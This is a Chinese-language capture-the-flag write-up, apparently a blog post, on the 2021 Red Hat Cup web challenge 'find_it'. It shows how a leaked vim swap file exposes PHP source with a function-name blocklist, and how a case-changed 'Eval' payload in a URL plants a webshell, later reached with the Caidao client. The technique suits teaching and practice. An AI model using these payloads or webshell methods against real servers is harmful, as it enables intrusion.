2021-第四届红帽杯网络安全大赛-Web-find_it

2021-第四届红帽杯网络安全大赛-Web-find_it

题目
在这里插入图片描述
先用目录扫描工具爆破一下目录,发现了robots.txt
在这里插入图片描述
访问后有了提示 1ndexx.php
在这里插入图片描述
直接访问不到,需要访问vim的保存的缓冲类型文件.swp,访问之后获取到源码。
在这里插入图片描述

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp

在这里插入图片描述
把关键代码粘贴出来看一下运行流程

  • 打开flag.php读取文件内容

  • 打开hack.php文件,获取code参数

  • 正则匹配危险函数

  • 字符串长度不能超过33

  • 将code参数的内容写入hack.php

  • 将flag.php内容写入hack.php

<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
 die("you die");
}
if(strlen($a)>33){
 die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>

利用方式1:大小写过滤,利用Eval绕过eval限制,成功获取webshell

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?php%20@Eval($_POST[%27aaa%27]);?%3E
使用菜刀工具连接hack.php
在这里插入图片描述
利用方式2:利用show_source高亮代码,再看代码的时候注意到flag.php里的内容会被写入到hack.php中,这样只需要高亮自己就可以看到flag了。
http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?php%20show_source(FILE);?%3E
不过这种方式我没有成功

参考:
https://www.jianshu.com/p/e17bf9e64e18

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值